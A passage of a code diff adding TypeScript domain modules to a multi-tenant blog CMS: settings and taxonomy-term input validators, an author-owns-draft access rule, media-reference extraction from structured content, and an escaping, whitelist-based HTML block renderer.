+  contentQualityChecklistPolicy?: ChecklistPolicyOverrides;
+  /**
+   * Issue #649 — tenant-level R2 fallback social preview image (source
+   * priority #4 in `social-preview-image-resolution.ts`'s chain, the last
+   * resort when a post has no explicit SEO image, no featured image, and no
+   * usable verified image in its own content). A `awcms_news_media_
+   * objects` id — existence/ownership/verified-status is re-checked at
+   * RENDER time the exact same way `featuredMediaId` already is
+   * (`NewsMediaPort.resolveMediaReferences`), never trusted from this
+   * stored value alone. Storing the id in the generic tenant-writable
+   * settings jsonb is safe for the same reason `contentQualityChecklistPolicy`
+   * already is (see that field's comment below): this is a tenant BUSINESS
+   * preference, not a security signal — the actual R2-only enforcement lives
+   * entirely in the render-time resolution step.
+   */
+  socialPreviewFallbackImageMediaId?: string | null;
+  /**
+   * Issue #649 — source priority #3 ("first verified R2 image in content if
+   * tenant policy allows") toggle. Default `true` (opt-out, matching this
+   * repo's convention for a feature that adds no new attack surface — see
+   * `blog-settings-directory.ts`'s `toView`).
+   */
+  socialPreviewContentImageFallbackEnabled?: boolean;
+};
+
+export type UpdateBlogSettingsValidationResult =
+  | { valid: true; value: UpdateBlogSettingsInput }
+  | { valid: false; errors: ValidationError[] };
+
+function validateOptionalBoundedString(
+  value: unknown,
+  field: string,
+  maxLength: number,
+  requireNonEmpty: boolean
+): ValidationError | null {
+  if (value === null && !requireNonEmpty) {
+    return null;
+  }
+
+  if (
+    typeof value !== "string" ||
+    (requireNonEmpty && value.trim().length === 0)
+  ) {
+    return {
+      field,
+      message: requireNonEmpty
+        ? `${field} must be a non-empty string.`
+        : `${field} must be a string or null.`
+    };
+  }
+
+  if (value.length > maxLength) {
+    return {
+      field,
+      message: `${field} must be at most ${maxLength} characters.`
+    };
+  }
+
+  return null;
+}
+
+/**
+ * `contentQualityChecklistPolicy` (Issue #640) — a tenant-configurable
+ * warning-vs-blocking/info override for the checklist's NON-security rules
+ * only. Unknown keys (typos, or an attempt to name a security rule id like
+ * `unsafe_html_rejected`/`no_local_image_path`) are rejected with a `400`
+ * rather than silently ignored — same "surface the mistake, don't eat it"
+ * choice `resolveSeverity`'s defense-in-depth re-check in `content-quality-
+ * checklist.ts` documents for the read side. Storing this in
+ * `awcms_blog_settings.settings` (the existing tenant-writable
+ * catch-all jsonb column, same as `blogTitle`/`rssEnabled`) is intentional,
+ * NOT the anti-pattern Issue #636 documented (`.claude/skills/awcms-
+ * news-portal/SKILL.md` §636 "JANGAN pernah menaruh sinyal keamanan/
+ * enforcement..."): that lesson was about a SECURITY signal living in a
+ * generic-writable place. This is the opposite — a tenant BUSINESS
+ * preference for non-security severities, where the security rule ids are
+ * hard-coded in `content-quality-checklist.ts` and never read from this
+ * settings blob at all, so there is no bypass path a tenant-writable value
+ * could ever unlock here.
+ */
+function validateContentQualityChecklistPolicy(
+  value: unknown
+): { valid: true; value: ChecklistPolicyOverrides } | { valid: false } {
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    return { valid: false };
+  }
+
+  const record = value as Record<string, unknown>;
+  const result: ChecklistPolicyOverrides = {};
+
+  for (const [key, severity] of Object.entries(record)) {
+    if (
+      !isOverridableChecklistRuleId(key) ||
+      !isValidChecklistSeverity(severity)
+    ) {
+      return { valid: false };
+    }
+
+    result[key] = severity;
+  }
+
+  return { valid: true, value: result };
+}
+
+export function validateUpdateBlogSettingsInput(
+  body: unknown
+): UpdateBlogSettingsValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+  const value: UpdateBlogSettingsInput = {};
+
+  if (record.blogTitle !== undefined) {
+    const error = validateOptionalBoundedString(
+      record.blogTitle,
+      "blogTitle",
+      MAX_BLOG_TITLE_LENGTH,
+      true
+    );
+    if (error) {
+      errors.push(error);
+    } else {
+      value.blogTitle = (record.blogTitle as string).trim();
+    }
+  }
+
+  if (record.blogDescription !== undefined) {
+    const error = validateOptionalBoundedString(
+      record.blogDescription,
+      "blogDescription",
+      MAX_BLOG_DESCRIPTION_LENGTH,
+      false
+    );
+    if (error) {
+      errors.push(error);
+    } else {
+      value.blogDescription =
+        record.blogDescription === null
+          ? null
+          : (record.blogDescription as string).trim();
+    }
+  }
+
+  if (record.postsPerPage !== undefined) {
+    if (
+      typeof record.postsPerPage !== "number" ||
+      !Number.isInteger(record.postsPerPage) ||
+      record.postsPerPage < MIN_POSTS_PER_PAGE ||
+      record.postsPerPage > MAX_POSTS_PER_PAGE
+    ) {
+      errors.push({
+        field: "postsPerPage",
+        message: `postsPerPage must be an integer between ${MIN_POSTS_PER_PAGE} and ${MAX_POSTS_PER_PAGE}.`
+      });
+    } else {
+      value.postsPerPage = record.postsPerPage;
+    }
+  }
+
+  if (record.rssEnabled !== undefined) {
+    if (typeof record.rssEnabled !== "boolean") {
+      errors.push({
+        field: "rssEnabled",
+        message: "rssEnabled must be a boolean."
+      });
+    } else {
+      value.rssEnabled = record.rssEnabled;
+    }
+  }
+
+  if (record.sitemapEnabled !== undefined) {
+    if (typeof record.sitemapEnabled !== "boolean") {
+      errors.push({
+        field: "sitemapEnabled",
+        message: "sitemapEnabled must be a boolean."
+      });
+    } else {
+      value.sitemapEnabled = record.sitemapEnabled;
+    }
+  }
+
+  if (record.defaultLocale !== undefined) {
+    const error = validateLocaleField(record.defaultLocale);
+    if (error) {
+      errors.push({ field: "defaultLocale", message: error.message });
+    } else {
+      value.defaultLocale = (record.defaultLocale as string).trim();
+    }
+  }
+
+  if (record.defaultVisibility !== undefined) {
+    if (!isBlogContentVisibility(record.defaultVisibility)) {
+      errors.push({
+        field: "defaultVisibility",
+        message: "defaultVisibility must be one of public, private, unlisted."
+      });
+    } else {
+      value.defaultVisibility = record.defaultVisibility;
+    }
+  }
+
+  if (record.seoDefaultTitle !== undefined) {
+    const error = validateOptionalBoundedString(
+      record.seoDefaultTitle,
+      "seoDefaultTitle",
+      MAX_SEO_TITLE_LENGTH,
+      false
+    );
+    if (error) {
+      errors.push(error);
+    } else {
+      value.seoDefaultTitle =
+        record.seoDefaultTitle === null
+          ? null
+          : (record.seoDefaultTitle as string).trim();
+    }
+  }
+
+  if (record.seoDefaultDescription !== undefined) {
+    const error = validateOptionalBoundedString(
+      record.seoDefaultDescription,
+      "seoDefaultDescription",
+      MAX_SEO_DESCRIPTION_LENGTH,
+      false
+    );
+    if (error) {
+      errors.push(error);
+    } else {
+      value.seoDefaultDescription =
+        record.seoDefaultDescription === null
+          ? null
+          : (record.seoDefaultDescription as string).trim();
+    }
+  }
+
+  if (record.contentQualityChecklistPolicy !== undefined) {
+    const policyResult = validateContentQualityChecklistPolicy(
+      record.contentQualityChecklistPolicy
+    );
+    if (!policyResult.valid) {
+      errors.push({
+        field: "contentQualityChecklistPolicy",
+        message:
+          "contentQualityChecklistPolicy must map overridable rule ids (excerpt_present, meta_description_present, featured_image_exists, featured_image_alt_text, featured_image_dimensions, og_image_trusted, taxonomy_exists, social_preview_image_ready, social_preview_image_alt_text) to a severity (blocking, warning, info)."
+      });
+    } else {
+      value.contentQualityChecklistPolicy = policyResult.value;
+    }
+  }
+
+  if (record.socialPreviewFallbackImageMediaId !== undefined) {
+    const raw = record.socialPreviewFallbackImageMediaId;
+    if (raw !== null && (typeof raw !== "string" || !UUID_PATTERN.test(raw))) {
+      errors.push({
+        field: "socialPreviewFallbackImageMediaId",
+        message: "socialPreviewFallbackImageMediaId must be a UUID or null."
+      });
+    } else {
+      value.socialPreviewFallbackImageMediaId = raw;
+    }
+  }
+
+  if (record.socialPreviewContentImageFallbackEnabled !== undefined) {
+    if (typeof record.socialPreviewContentImageFallbackEnabled !== "boolean") {
+      errors.push({
+        field: "socialPreviewContentImageFallbackEnabled",
+        message: "socialPreviewContentImageFallbackEnabled must be a boolean."
+      });
+    } else {
+      value.socialPreviewContentImageFallbackEnabled =
+        record.socialPreviewContentImageFallbackEnabled;
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/blog-content/domain/blog-term-validation.ts
+++ b/src/modules/blog-content/domain/blog-term-validation.ts
@@ -1,0 +1,259 @@
+import { isValidSlug } from "./slug-policy";
+import {
+  isTaxonomyType,
+  validateTermParent,
+  type TaxonomyType
+} from "./taxonomy-policy";
+import {
+  validateDeleteReasonInput,
+  type DeleteReasonInput
+} from "./content-validation";
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+const MAX_NAME_LENGTH = 100;
+const MAX_DESCRIPTION_LENGTH = 500;
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+function validateParentId(
+  value: unknown
+): { valid: true; value: string | null } | { valid: false } {
+  if (value === undefined || value === null) {
+    return { valid: true, value: null };
+  }
+
+  if (typeof value !== "string" || !UUID_PATTERN.test(value)) {
+    return { valid: false };
+  }
+
+  return { valid: true, value };
+}
+
+export type CreateBlogTermInput = {
+  taxonomyType: TaxonomyType;
+  parentId: string | null;
+  name: string;
+  slug: string;
+  description: string | null;
+};
+
+export type CreateBlogTermValidationResult =
+  | { valid: true; value: CreateBlogTermInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `POST /api/v1/blog/terms` (Issue #539). Doc issue #539 §Data Rules — Categories and Tags: a tag must reject `parentId` (`validateTermParent`), slug format matches posts/pages. */
+export function validateCreateBlogTermInput(
+  body: unknown
+): CreateBlogTermValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+
+  if (!isTaxonomyType(record.taxonomyType)) {
+    errors.push({
+      field: "taxonomyType",
+      message: "taxonomyType must be one of category, tag."
+    });
+  }
+
+  if (!isNonEmptyString(record.name) || record.name.length > MAX_NAME_LENGTH) {
+    errors.push({
+      field: "name",
+      message: `name is required and must be at most ${MAX_NAME_LENGTH} characters.`
+    });
+  }
+
+  if (!isNonEmptyString(record.slug)) {
+    errors.push({ field: "slug", message: "slug is required." });
+  } else if (!isValidSlug(record.slug)) {
+    errors.push({
+      field: "slug",
+      message:
+        "slug must be lowercase alphanumeric segments separated by single hyphens."
+    });
+  }
+
+  if (
+    record.description !== undefined &&
+    record.description !== null &&
+    (typeof record.description !== "string" ||
+      record.description.length > MAX_DESCRIPTION_LENGTH)
+  ) {
+    errors.push({
+      field: "description",
+      message: `description must be a string of at most ${MAX_DESCRIPTION_LENGTH} characters.`
+    });
+  }
+
+  const parentIdResult = validateParentId(record.parentId);
+  if (!parentIdResult.valid) {
+    errors.push({
+      field: "parentId",
+      message: "parentId must be a UUID or null."
+    });
+  }
+
+  if (isTaxonomyType(record.taxonomyType) && parentIdResult.valid) {
+    const ownershipResult = validateTermParent(
+      record.taxonomyType,
+      null,
+      parentIdResult.value
+    );
+    if (!ownershipResult.valid) {
+      errors.push(...ownershipResult.errors);
+    }
+  }
+
+  if (errors.length > 0 || !parentIdResult.valid) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      taxonomyType: record.taxonomyType as TaxonomyType,
+      parentId: parentIdResult.value,
+      name: (record.name as string).trim(),
+      slug: (record.slug as string).trim(),
+      description:
+        record.description === undefined || record.description === null
+          ? null
+          : (record.description as string).trim()
+    }
+  };
+}
+
+export type UpdateBlogTermInput = {
+  taxonomyType?: TaxonomyType;
+  parentId?: string | null;
+  name?: string;
+  slug?: string;
+  description?: string | null;
+};
+
+export type UpdateBlogTermValidationResult =
+  | { valid: true; value: UpdateBlogTermInput }
+  | { valid: false; errors: ValidationError[] };
+
+/**
+ * `PATCH /api/v1/blog/terms/{id}` (Issue #539). Only fields present in the
+ * body are validated/copied. The tag/no-parent ownership rule is
+ * re-checked here only when *both* `taxonomyType` and `parentId` are
+ * being changed together — checking a lone `parentId` change against the
+ * term's *existing* `taxonomyType` requires the current row, which the
+ * validator (a pure function) does not have; the application layer
+ * (`blog-taxonomy-directory.ts`'s `updateBlogTerm`) re-derives the
+ * effective taxonomyType from the existing row before writing, and the
+ * `awcms_blog_terms_tag_no_parent_check` DB constraint is the final
+ * backstop either way.
+ */
+export function validateUpdateBlogTermInput(
+  body: unknown
+): UpdateBlogTermValidationResult {
+  const errors: ValidationError[] = [];
+  const record = (body ?? {}) as Record<string, unknown>;
+  const value: UpdateBlogTermInput = {};
+
+  if (record.taxonomyType !== undefined) {
+    if (!isTaxonomyType(record.taxonomyType)) {
+      errors.push({
+        field: "taxonomyType",
+        message: "taxonomyType must be one of category, tag."
+      });
+    } else {
+      value.taxonomyType = record.taxonomyType;
+    }
+  }
+
+  if (record.name !== undefined) {
+    if (
+      !isNonEmptyString(record.name) ||
+      record.name.length > MAX_NAME_LENGTH
+    ) {
+      errors.push({
+        field: "name",
+        message: `name must be a non-empty string of at most ${MAX_NAME_LENGTH} characters.`
+      });
+    } else {
+      value.name = record.name.trim();
+    }
+  }
+
+  if (record.slug !== undefined) {
+    if (!isNonEmptyString(record.slug)) {
+      errors.push({ field: "slug", message: "slug is required." });
+    } else if (!isValidSlug(record.slug)) {
+      errors.push({
+        field: "slug",
+        message:
+          "slug must be lowercase alphanumeric segments separated by single hyphens."
+      });
+    } else {
+      value.slug = record.slug.trim();
+    }
+  }
+
+  if (record.description !== undefined) {
+    if (
+      record.description !== null &&
+      (typeof record.description !== "string" ||
+        record.description.length > MAX_DESCRIPTION_LENGTH)
+    ) {
+      errors.push({
+        field: "description",
+        message: `description must be a string of at most ${MAX_DESCRIPTION_LENGTH} characters or null.`
+      });
+    } else {
+      value.description = record.description as string | null;
+    }
+  }
+
+  if (record.parentId !== undefined) {
+    const parentIdResult = validateParentId(record.parentId);
+    if (!parentIdResult.valid) {
+      errors.push({
+        field: "parentId",
+        message: "parentId must be a UUID or null."
+      });
+    } else {
+      value.parentId = parentIdResult.value;
+    }
+  }
+
+  if (value.taxonomyType !== undefined && value.parentId !== undefined) {
+    const ownershipResult = validateTermParent(
+      value.taxonomyType,
+      null,
+      value.parentId
+    );
+    if (!ownershipResult.valid) {
+      errors.push(...ownershipResult.errors);
+    }
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}
+
+export type SoftDeleteBlogTermInput = DeleteReasonInput;
+
+export type SoftDeleteBlogTermValidationResult =
+  | { valid: true; value: SoftDeleteBlogTermInput }
+  | { valid: false; errors: ValidationError[] };
+
+/** `DELETE /api/v1/blog/terms/{id}` body: `{ reason: string }`. No restore/purge for terms (doc issue #537's permission seed has no `taxonomies.restore`/`.purge` — `taxonomies.configure` covers any future restore). */
+export function validateSoftDeleteBlogTermInput(
+  body: unknown
+): SoftDeleteBlogTermValidationResult {
+  return validateDeleteReasonInput(body);
+}

--- a/src/modules/blog-content/domain/content-access-policy.ts
+++ b/src/modules/blog-content/domain/content-access-policy.ts
@@ -1,0 +1,55 @@
+import type {
+  AccessDecision,
+  AccessRequest,
+  TenantContext
+} from "../../identity-access/domain/access-control";
+import { evaluateAccess } from "../../identity-access/domain/access-control";
+import type { BlogContentStatus } from "./post-status";
+
+export type ContentOwnershipAttributes = {
+  authorTenantUserId: string;
+  status: BlogContentStatus;
+};
+
+/**
+ * Generic "author may edit their own unpublished content" ABAC override,
+ * factored out of Issue #538's `post-access-policy.ts` so Issue #539's
+ * pages can reuse the exact same rule (doc issue #539: "same auth, tenant,
+ * RBAC/ABAC, audit, idempotency, RLS, and standard response patterns
+ * introduced in the blog post API") without duplicating the logic.
+ *
+ * Deliberately not part of `identity-access/domain/access-control.ts`'s
+ * shared `evaluateAccess` — see `post-access-policy.ts` for the full
+ * reasoning (ADR-0004 default-deny; a resource-ownership ALLOW override is
+ * `blog_content`-specific business logic, not a cross-module primitive).
+ */
+export function evaluateContentUpdateAccess(
+  context: TenantContext,
+  grantedPermissionKeys: ReadonlySet<string>,
+  updateGuard: AccessRequest,
+  resource: ContentOwnershipAttributes
+): AccessDecision {
+  const roleDecision = evaluateAccess(
+    context,
+    updateGuard,
+    grantedPermissionKeys
+  );
+
+  if (roleDecision.allowed) {
+    return roleDecision;
+  }
+
+  if (
+    roleDecision.matchedPolicy === "default_deny" &&
+    resource.authorTenantUserId === context.tenantUserId &&
+    resource.status !== "published"
+  ) {
+    return {
+      allowed: true,
+      reason: "Author may edit their own unpublished content.",
+      matchedPolicy: "author_own_draft_allow"
+    };
+  }
+
+  return roleDecision;
+}

--- a/src/modules/blog-content/domain/content-block-media-references.ts
+++ b/src/modules/blog-content/domain/content-block-media-references.ts
@@ -1,0 +1,164 @@
+/**
+ * Pure extraction of media references from `content_json` (Issue #636,
+ * epic `news_portal`; extended by Issue #639 for the `video_news` block's
+ * thumbnail). Deliberately separate from `content-block-rendering.ts`'s
+ * renderer: this module answers "what does this content claim to
+ * reference" (used by the application layer to verify those references
+ * exist/are safe before a post/page is written), while the renderer
+ * answers "how do I safely turn already-write-time-validated content into
+ * HTML." Neither depends on the other.
+ *
+ * `collectGalleryImageReferences` only ever looked at `mediaType: "image"`
+ * gallery items — `"video"` gallery items were, and remain, untouched by
+ * it (that was never this file's job; a video news block is a distinct
+ * block TYPE, not a gallery item). Issue #639 adds a second, independent
+ * extraction function below (`collectVideoNewsThumbnailReferences`) for
+ * the new `video_news` block type's OPTIONAL `thumbnailMediaObjectId`
+ * field — additive, does not modify `collectGalleryImageReferences` at
+ * all.
+ */
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function isRecordArray(value: unknown): value is Record<string, unknown>[] {
+  return Array.isArray(value) && value.every(isRecord);
+}
+
+export type GalleryImageReferenceViolation = {
+  /** 0-based index of the offending item within the `gallery` block's `items` array. */
+  itemIndex: number;
+  reason: "raw_url_not_allowed" | "media_object_id_missing_or_malformed";
+  /**
+   * The offending raw `url` value, only present when `reason` is
+   * `"raw_url_not_allowed"` (Issue #640, content quality checklist) — lets a
+   * caller classify the violation as a local path vs. an arbitrary external
+   * URL (`content-quality-checklist.ts`'s `classifyRawImageUrl`) without a
+   * second traversal of `contentJson` that could drift from this one.
+   */
+  rawUrl?: string;
+};
+
+export type GalleryImageReferences = {
+  /** Deduplicated, well-formed-UUID `mediaObjectId`s referenced by image gallery items — candidates for existence/status verification. */
+  mediaObjectIds: string[];
+  /** Items that cannot possibly be valid in full-online R2-only mode, independent of whether any `mediaObjectId` actually resolves. */
+  violations: GalleryImageReferenceViolation[];
+};
+
+/**
+ * Scans every `gallery` block's `items` for `mediaType: "image"` entries.
+ * Deliberately tolerant of malformed/unknown shapes elsewhere in
+ * `contentJson` (mirrors `content-block-rendering.ts`'s own "skip, don't
+ * throw" convention) — this function's job is only to enumerate what a
+ * caller must verify, not to fully validate `contentJson`'s shape (that
+ * remains `validateContentJsonField`'s job).
+ */
+export function collectGalleryImageReferences(
+  contentJson: Record<string, unknown>
+): GalleryImageReferences {
+  const mediaObjectIds = new Set<string>();
+  const violations: GalleryImageReferenceViolation[] = [];
+
+  const blocks = contentJson.blocks;
+  if (!isRecordArray(blocks)) {
+    return { mediaObjectIds: [], violations: [] };
+  }
+
+  for (const block of blocks) {
+    if (block.type !== "gallery" || !isRecordArray(block.items)) {
+      continue;
+    }
+
+    block.items.forEach((item, itemIndex) => {
+      if (item.mediaType !== "image") {
+        return;
+      }
+
+      if (typeof item.url === "string" && item.url.trim().length > 0) {
+        violations.push({
+          itemIndex,
+          reason: "raw_url_not_allowed",
+          rawUrl: item.url
+        });
+        return;
+      }
+
+      if (
+        typeof item.mediaObjectId !== "string" ||
+        !UUID_PATTERN.test(item.mediaObjectId)
+      ) {
+        violations.push({
+          itemIndex,
+          reason: "media_object_id_missing_or_malformed"
+        });
+        return;
+      }
+
+      mediaObjectIds.add(item.mediaObjectId);
+    });
+  }
+
+  return { mediaObjectIds: [...mediaObjectIds], violations };
+}
+
+export type VideoNewsThumbnailReferenceViolation = {
+  /** 0-based index of the offending block within `contentJson.blocks`. */
+  blockIndex: number;
+  reason: "media_object_id_malformed";
+};
+
+export type VideoNewsThumbnailReferences = {
+  /** Deduplicated, well-formed-UUID `thumbnailMediaObjectId`s referenced by `video_news` blocks — candidates for existence/status verification. */
+  mediaObjectIds: string[];
+  /** `video_news` blocks whose PRESENT `thumbnailMediaObjectId` cannot possibly be valid, independent of whether it actually resolves. */
+  violations: VideoNewsThumbnailReferenceViolation[];
+};
+
+/**
+ * Scans every `video_news` block for its optional `thumbnailMediaObjectId`
+ * (Issue #639). A custom thumbnail is OPTIONAL (the issue's own Rules allow
+ * a tenant to fall back to the provider's default thumbnail instead), so a
+ * MISSING `thumbnailMediaObjectId` is never a violation — only a PRESENT
+ * but malformed (non-UUID) one is. Existence/tenant-ownership/verified-
+ * status checking of the ids returned here is the caller's job
+ * (`application/video-news-thumbnail-reference-gate.ts`), same
+ * "extraction is pure, verification needs a DB round trip" split
+ * `collectGalleryImageReferences` established.
+ */
+export function collectVideoNewsThumbnailReferences(
+  contentJson: Record<string, unknown>
+): VideoNewsThumbnailReferences {
+  const mediaObjectIds = new Set<string>();
+  const violations: VideoNewsThumbnailReferenceViolation[] = [];
+
+  const blocks = contentJson.blocks;
+  if (!isRecordArray(blocks)) {
+    return { mediaObjectIds: [], violations: [] };
+  }
+
+  blocks.forEach((block, blockIndex) => {
+    if (
+      block.type !== "video_news" ||
+      block.thumbnailMediaObjectId === undefined ||
+      block.thumbnailMediaObjectId === null
+    ) {
+      return;
+    }
+
+    if (
+      typeof block.thumbnailMediaObjectId !== "string" ||
+      !UUID_PATTERN.test(block.thumbnailMediaObjectId)
+    ) {
+      violations.push({ blockIndex, reason: "media_object_id_malformed" });
+      return;
+    }
+
+    mediaObjectIds.add(block.thumbnailMediaObjectId);
+  });
+
+  return { mediaObjectIds: [...mediaObjectIds], violations };
+}

--- a/src/modules/blog-content/domain/content-block-rendering.ts
+++ b/src/modules/blog-content/domain/content-block-rendering.ts
@@ -1,0 +1,205 @@
+import { escapeHtml } from "../../../lib/html/escape";
+import {
+  collectGalleryImageReferences,
+  collectVideoNewsThumbnailReferences
+} from "./content-block-media-references";
+import {
+  renderGalleryBlockHtml,
+  type GalleryBlockItem,
+  type ResolvedGalleryMediaUrls
+} from "../../_shared/rendering/gallery-block-renderer";
+import {
+  renderVideoNewsBlockHtml,
+  type VideoNewsBlockItem
+} from "../../_shared/rendering/video-news-block-renderer";
+
+/**
+ * Safe, whitelist-based renderer for `content_json` (Issue #540 §Content
+ * Safety Requirements: "Use structured JSON content as the source of
+ * truth", "Rendering must sanitize or safely render content", "Script
+ * tags/inline JavaScript/dangerous iframe-embed must be rejected or
+ * stripped"). `content_json` was already write-time-rejected for unsafe
+ * markup (`validateContentJsonField`, Issue #538) — this is the
+ * *rendering*-side defense-in-depth layer: every block type in the
+ * whitelist below only ever emits text through `escapeHtml`, and any
+ * value outside the whitelist (unknown block `type`, non-string `text`,
+ * raw HTML field, etc.) is silently skipped rather than rendered. There
+ * is no "raw html" block type — by construction, this renderer cannot
+ * emit a `<script>`/`<iframe>`/`<embed>`/`<object>` tag or an inline
+ * event handler no matter what `content_json` contains.
+ *
+ * This is the first place in the repo that defines a concrete shape for
+ * `content_json` (previously "opaque to the API", doc issue #537/#538) —
+ * `{ blocks: ContentBlock[] }` with six block types: paragraph, heading,
+ * list, quote, gallery (Issue #542, public image/video display, deliberately
+ * not a new media-library table since there is no base media library to
+ * integrate with beyond a loose URL, see
+ * `sql/029_awcms_blog_content_presentation_schema.sql`'s header
+ * comment), and `video_news` (Issue #639 — a safe, provider-allowlisted
+ * video embed; never a raw stored `<iframe>`, see
+ * `_shared/rendering/video-news-block-renderer.ts`'s header). A derived app
+ * or later issue needing richer blocks (embed, table, ...) extends the
+ * `switch` below, not a general raw-HTML escape hatch.
+ */
+/** Re-exported from `_shared/rendering/gallery-block-renderer.ts` (Issue #681) — kept under this file's established name (`GalleryItem`) for every existing importer, even though the actual gallery-item rendering logic now lives in neutral shared ground rather than here (see that file's header for why). */
+export type GalleryItem = GalleryBlockItem;
+
+/** `mediaObjectId -> public URL` for gallery items using the Issue #636 R2-only-mode reference shape — built by the caller (`resolveVerifiedNewsMediaReferences`) BEFORE rendering, since resolving a registry id requires a database round trip this renderer deliberately never performs itself (kept pure, same as every other function in this file). Re-exported from `_shared/rendering/gallery-block-renderer.ts` (Issue #681). */
+export type { ResolvedGalleryMediaUrls };
+
+/** Re-exported from `_shared/rendering/video-news-block-renderer.ts` (Issue #639) — the actual video-embed rendering logic lives in neutral shared ground (same reasoning as `GalleryItem`/`ResolvedGalleryMediaUrls` above), reusable by a future `news_portal` homepage `video_block` section without a domain-to-domain import. */
+export type VideoNewsItem = VideoNewsBlockItem;
+
+export type ContentBlock =
+  | { type: "paragraph"; text: string }
+  | { type: "heading"; level: 1 | 2 | 3 | 4 | 5 | 6; text: string }
+  | { type: "list"; ordered?: boolean; items: string[] }
+  | { type: "quote"; text: string }
+  | { type: "gallery"; items: GalleryItem[] }
+  | ({ type: "video_news" } & VideoNewsItem);
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function renderParagraph(text: unknown): string | null {
+  if (typeof text !== "string" || text.trim().length === 0) {
+    return null;
+  }
+
+  return `<p>${escapeHtml(text)}</p>`;
+}
+
+function renderHeading(level: unknown, text: unknown): string | null {
+  if (
+    typeof text !== "string" ||
+    text.trim().length === 0 ||
+    typeof level !== "number" ||
+    !Number.isInteger(level) ||
+    level < 1 ||
+    level > 6
+  ) {
+    return null;
+  }
+
+  return `<h${level}>${escapeHtml(text)}</h${level}>`;
+}
+
+function renderList(ordered: unknown, items: unknown): string | null {
+  if (!Array.isArray(items) || items.length === 0) {
+    return null;
+  }
+
+  const listItems = items
+    .filter(
+      (item): item is string =>
+        typeof item === "string" && item.trim().length > 0
+    )
+    .map((item) => `<li>${escapeHtml(item)}</li>`)
+    .join("");
+
+  if (listItems.length === 0) {
+    return null;
+  }
+
+  const tag = ordered === true ? "ol" : "ul";
+  return `<${tag}>${listItems}</${tag}>`;
+}
+
+function renderQuote(text: unknown): string | null {
+  if (typeof text !== "string" || text.trim().length === 0) {
+    return null;
+  }
+
+  return `<blockquote>${escapeHtml(text)}</blockquote>`;
+}
+
+function renderBlock(
+  block: unknown,
+  resolvedMediaUrls: ResolvedGalleryMediaUrls
+): string | null {
+  if (!isRecord(block)) {
+    return null;
+  }
+
+  switch (block.type) {
+    case "paragraph":
+      return renderParagraph(block.text);
+    case "heading":
+      return renderHeading(block.level, block.text);
+    case "list":
+      return renderList(block.ordered, block.items);
+    case "quote":
+      return renderQuote(block.text);
+    case "gallery":
+      return renderGalleryBlockHtml(block.items, resolvedMediaUrls);
+    case "video_news":
+      return renderVideoNewsBlockHtml(block, resolvedMediaUrls);
+    default:
+      return null;
+  }
+}
+
+const EMPTY_RESOLVED_MEDIA_URLS: ResolvedGalleryMediaUrls = new Map();
+
+/**
+ * Renders `contentJson.blocks` to a safe HTML string. Malformed/unknown
+ * blocks are silently skipped, never thrown — a corrupt or unexpected
+ * shape must degrade to "renders less", not a 500 with a stack trace (doc
+ * issue #540: "Error output must not expose stack traces").
+ *
+ * `resolvedMediaUrls` (Issue #636) defaults to empty, which is the correct
+ * behavior for every existing call site that hasn't been updated to
+ * resolve `mediaObjectId`-based gallery items — those items simply render
+ * nothing (never a broken `<img>` tag), while `url`-based items are
+ * entirely unaffected either way.
+ */
+export function renderContentJsonToHtml(
+  contentJson: Record<string, unknown>,
+  resolvedMediaUrls: ResolvedGalleryMediaUrls = EMPTY_RESOLVED_MEDIA_URLS
+): string {
+  const blocks = contentJson.blocks;
+
+  if (!Array.isArray(blocks)) {
+    return "";
+  }
+
+  return blocks
+    .map((block) => renderBlock(block, resolvedMediaUrls))
+    .filter((html): html is string => html !== null)
+    .join("\n");
+}
+
+/**
+ * Extracts every well-formed `mediaObjectId` an image gallery item
+ * references, so a caller can resolve them
+ * (`resolveVerifiedNewsMediaReferences`) BEFORE calling
+ * `renderContentJsonToHtml` — this renderer is synchronous/pure and cannot
+ * itself perform the database round trip resolution requires. Thin
+ * re-export of `content-block-media-references.ts`'s
+ * `collectGalleryImageReferences` (its write-time violation list is
+ * irrelevant here — already-written content is trusted to have passed
+ * write-time validation — only the id list matters for render-time
+ * resolution), kept as one traversal instead of two so the definition of
+ * "which gallery items reference a media object" can never drift between
+ * write-time validation and render-time resolution.
+ */
+export function collectRenderableGalleryMediaObjectIds(
+  contentJson: Record<string, unknown>
+): string[] {
+  return collectGalleryImageReferences(contentJson).mediaObjectIds;
+}
+
+/**
+ * Same reasoning as `collectRenderableGalleryMediaObjectIds` above, for
+ * `video_news` blocks' `thumbnailMediaObjectId` (Issue #639). The returned
+ * ids share the SAME news-media-registry id space as gallery/featured
+ * image ids — a caller resolves both in one bulk lookup and passes the
+ * combined map as `renderContentJsonToHtml`'s single `resolvedMediaUrls`
+ * parameter (no separate parameter needed for video thumbnails).
+ */
+export function collectRenderableVideoNewsThumbnailMediaObjectIds(
+  contentJson: Record<string, unknown>
+): string[] {
+  return collectVideoNewsThumbnailReferences(contentJson).mediaObjectIds;
+}

--- a/src/modules/blog-content/domain/content-quality-checklist.ts
+++ b/src/modules/blog-content/domain/content-quality-checklist.ts
@@ -1,0 +1,651 @@
+/**
+ * Content quality checklist (Issue #640, epic `news_portal`) — pure rule
+ * evaluation. Deliberately mirrors Issue #636's own mode-gating precedent
+ * (`news-media-reference-gate.ts`): this ENTIRE checklist is a no-op
